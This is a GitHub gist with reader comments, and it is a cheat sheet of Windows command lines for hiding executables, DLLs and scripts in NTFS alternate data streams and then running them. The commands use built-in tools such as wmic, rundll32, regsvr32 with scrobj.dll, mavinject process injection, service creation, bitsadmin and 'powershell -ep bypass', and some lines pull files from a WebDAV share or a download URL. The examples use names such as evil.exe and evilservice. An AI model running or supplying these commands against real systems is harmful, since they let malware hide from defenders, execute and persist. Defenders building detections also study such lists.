Skip to content

Instantly share code, notes, and snippets.

Last active June 11, 2024 15:14
Show Gist options
  • Save api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f to your computer and use it in GitHub Desktop.
Save api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f to your computer and use it in GitHub Desktop.
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\ c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\

print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe

reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg

regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey

expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i: ^scrobj.dll > fakefile.doc:reg32.bat

"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url -path c:\\temp\\1.txt:7-zip.exe

msxsl.exe "" "" -o <filename>

Extract content from ADS

expand c:\ads\file.txt:test.exe c:\temp\evil.exe

esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o

PrintBrm -r -f C:\Users\user\Desktop\ -d C:\Users\user\Desktop\new_folder

Executing from ADS


wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'


rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll

rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll


cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"


wscript c:\ads\file.txt:script.vbs

echo GetObject("script:") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js


forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"


tasklist | findstr notepad
notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"


mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" (Does not work on Windows 10 1903 and newer)


control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll


sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice


powershell -ep bypass - < c:\temp:ttt

powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}


regedit c:\ads\file.txt:regfile.reg


bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile


AppVLP.exe c:\windows\tracing\test.txt:ha.exe


cmd.exe - < fakefile.doc:reg32.bat


ftp -s:fakefile.txt:aaaa.txt

ieframe.dll , shdocvw.dll (ads)

echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt


echo calc > && bash <
bash.exe -c $(


type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i: Textfile.txt:LoveADS

Write registry

regini.exe file.txt:hidden.ini From @elisalem9

Copy link

D4Vinci commented Apr 12, 2018

Great work man ,this helps a lot 😄

Copy link

Thanks. Good to hear.

Copy link

Hi. This is not persistence mechanisms. This is only ways of hiding programs withing ADS and ways of executing it. How to place your persistence is up to you. For instance a RUN key in registry could launch the WMIC command that execute data from an Alternate Data stream.

Copy link

webs3c commented Apr 27, 2018

"powershell Start-Process -FilePath xx.exe" can execute the file too~

Copy link

jmaravi commented Jun 17, 2018

Will AV detect the malicious payload?

Copy link

@jmaravi - yes.

Copy link

What about if you needed to delete an ADS? Not just empty it.

Copy link

Copy link

good job my brother and Allah Almighty will help you

Copy link

MikronT commented Feb 15, 2022

That's incredible man

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment